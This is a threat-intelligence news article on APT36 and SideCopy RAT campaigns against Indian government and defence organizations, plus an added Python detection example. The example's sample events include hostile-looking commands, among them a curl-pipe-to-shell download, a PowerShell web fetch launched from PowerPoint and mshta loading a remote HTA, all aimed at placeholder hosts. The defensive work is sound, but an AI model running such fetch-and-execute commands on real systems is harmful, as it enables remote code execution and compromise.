APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Organizations

India’s security sector and government-related organizations have been targeted by several campaigns designed to infect Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines.
The campaigns are characterized by the use of malware families such as Geta RAT, Ares RAT, and DeskRAT, and are attributed to Pakistan-aligned threat groups tracked as SideCopy and APT36 (aka Transparent Tribe). SideCopy, which has been active since at least 2019, is assessed to be a sub-cluster of Transparent Tribe.
“Taken together, these campaigns reinforce a familiar yet emerging narrative,” said Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka. “Transparent Tribe and SideCopy aren’t reinventing espionage – they’re refining it.”
“By expanding cross-platform coverage, relying on in-memory strategies, and experimenting with new delivery vectors, this ecosystem continues to operate under noise while maintaining strategic focus.”
Common to all campaigns is the use of phishing emails that carry malicious attachments or embedded download links leading the target to attacker-controlled infrastructure. These initial access vectors serve as a conduit for Windows shortcut (LNK) files, ELF binaries, and PowerPoint Add-In files that, when opened, initiate a multi-stage trojan deployment process.
The malware families are designed to provide persistent remote access, enable system reconnaissance, collect data, execute commands, and support long-term post-compromise operations in both Windows and Linux environments.
One of the attack chains works as follows: a malicious LNK file invokes "mshta.exe" to execute an HTML Application (HTA) file hosted on compromised legitimate domains. The HTA payload contains JavaScript that decrypts an embedded DLL payload, which, in turn, processes an embedded data blob to write a decoy PDF to disk, connect to a hard-coded command-and-control (C2) server, and display the saved decoy file.

After the lure document is displayed, the malware checks which security products are installed and adapts its persistence method accordingly before installing Geta RAT on the compromised host. It is worth noting that this series of attacks was detailed by CYFIRMA and by Seqrite Labs researcher Sathwik Ram Prakki in late December 2025.
Geta RAT supports various commands to gather system information, enumerate running processes, terminate a specific process, list installed applications, retrieve and replace clipboard contents with attacker-supplied data, capture screenshots, perform file operations, execute arbitrary shell commands, and harvest data from connected USB devices.
Running alongside this Windows-centric campaign is a Linux variant that uses a Go-based binary as the first stage to drop the Python-based Ares RAT via a shell script downloaded from an external server. Like Geta RAT, Ares RAT supports multiple commands to harvest sensitive data and to execute Python scripts or commands issued by the threat actor.
Aryaka said it also observed another campaign in which the Golang malware DeskRAT was delivered via a malicious PowerPoint Add-In file that used an embedded macro to establish an outbound connection to a remote server and download the malware. APT36's use of DeskRAT was previously documented by Sekoia and QiAnXin XLab in October 2025.
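The three delivery chains above (LNK to mshta.exe fetching a remote HTA, a PowerPoint Add-In macro reaching out to download DeskRAT, and a Go loader running a shell script that drops the Python-based Ares RAT) each leave a distinctive process-creation footprint. The following is an added example, not code from Aryaka or any of the vendors named in this article: a small rule pass over constructed process-creation events that flags those footprints while leaving benign lookalikes alone. Hostnames, paths and command lines in the sample events are made up for illustration.

```python
"""Toy detection pass over constructed process-creation events.

Added example for this article; not vendor code. Every event below is
constructed, and the URLs and paths are placeholders, not real IoCs.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    id: int
    host_os: str   # "windows" or "linux"
    parent: str    # parent image basename
    image: str     # process image basename
    cmdline: str


URL_RE = re.compile(r"https?://", re.IGNORECASE)
OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"sh", "bash", "dash"}
TMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def rule_mshta_remote_hta(e: ProcEvent) -> bool:
    """LNK chain: mshta.exe launched with a remote URL instead of a local .hta."""
    return (e.host_os == "windows"
            and e.image.lower() == "mshta.exe"
            and bool(URL_RE.search(e.cmdline)))


def rule_office_child_with_url(e: ProcEvent) -> bool:
    """Add-In/macro chain: an Office app spawning a child whose command line carries a URL."""
    return (e.host_os == "windows"
            and e.parent.lower() in OFFICE_APPS
            and bool(URL_RE.search(e.cmdline)))


def rule_shell_download_and_exec(e: ProcEvent) -> bool:
    """Linux loader stage: a shell one-liner that fetches a script and pipes it to an interpreter."""
    if e.host_os != "linux" or e.image not in SHELLS:
        return False
    return bool(re.search(r"\b(curl|wget)\b.*\|\s*(sh|bash|python3?)\b", e.cmdline))


def rule_python_from_tmp(e: ProcEvent) -> bool:
    """Python RAT stage: interpreter executing a script from a world-writable directory."""
    return (e.host_os == "linux"
            and e.image.startswith("python")
            and any(d in e.cmdline for d in TMP_DIRS))


RULES = {
    "mshta_remote_hta": rule_mshta_remote_hta,
    "office_child_with_url": rule_office_child_with_url,
    "shell_download_and_exec": rule_shell_download_and_exec,
    "python_from_tmp": rule_python_from_tmp,
}


def evaluate(events):
    """Return {event_id: [matched rule names]} for events that hit at least one rule."""
    hits = {}
    for e in events:
        matched = [name for name, fn in RULES.items() if fn(e)]
        if matched:
            hits[e.id] = matched
    return hits


# Constructed sample telemetry: four malicious-looking events and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(1, "windows", "explorer.exe", "mshta.exe",
              "mshta.exe https://compromised-site.example.invalid/update.hta"),
    ProcEvent(2, "windows", "explorer.exe", "mshta.exe",
              r"mshta.exe C:\Users\user\Desktop\local_tool.hta"),          # benign: local file
    ProcEvent(3, "windows", "powerpnt.exe", "powershell.exe",
              "powershell.exe -c iwr https://cdn.example.invalid/d.bin"),
    ProcEvent(4, "linux", "updater", "sh",
              'sh -c "curl -s http://loader.example.invalid/setup.sh | sh"'),
    ProcEvent(5, "linux", "sh", "python3", "python3 /tmp/.cache/agent.py"),
    ProcEvent(6, "windows", "explorer.exe", "chrome.exe",
              "chrome.exe https://www.example.com"),                       # benign: browser
]


if __name__ == "__main__":
    for event_id, names in evaluate(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(names)}")
```

Each rule keys on the relationship between parent, image and command line rather than on a hash or domain, so it survives the infrastructure rotation that the article's description of compromised legitimate domains implies; the price is that the `mshta.exe` and Office-child rules need an allowlist in environments that legitimately use those patterns.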
“These campaigns show a resourceful, intelligence-oriented actor who has deliberately targeted India’s defense, government, and strategic sectors by using security themes, forged official documents, and trusted infrastructure in the region,” the company said. “The work extends beyond defense to policy, research, critical infrastructure, and defense-related organizations operating within a common trusted ecosystem.”
“Deployment of DeskRAT, alongside Geta RAT and Ares RAT, underscores an evolving toolkit optimized for stealth, persistence, and long-term reach.”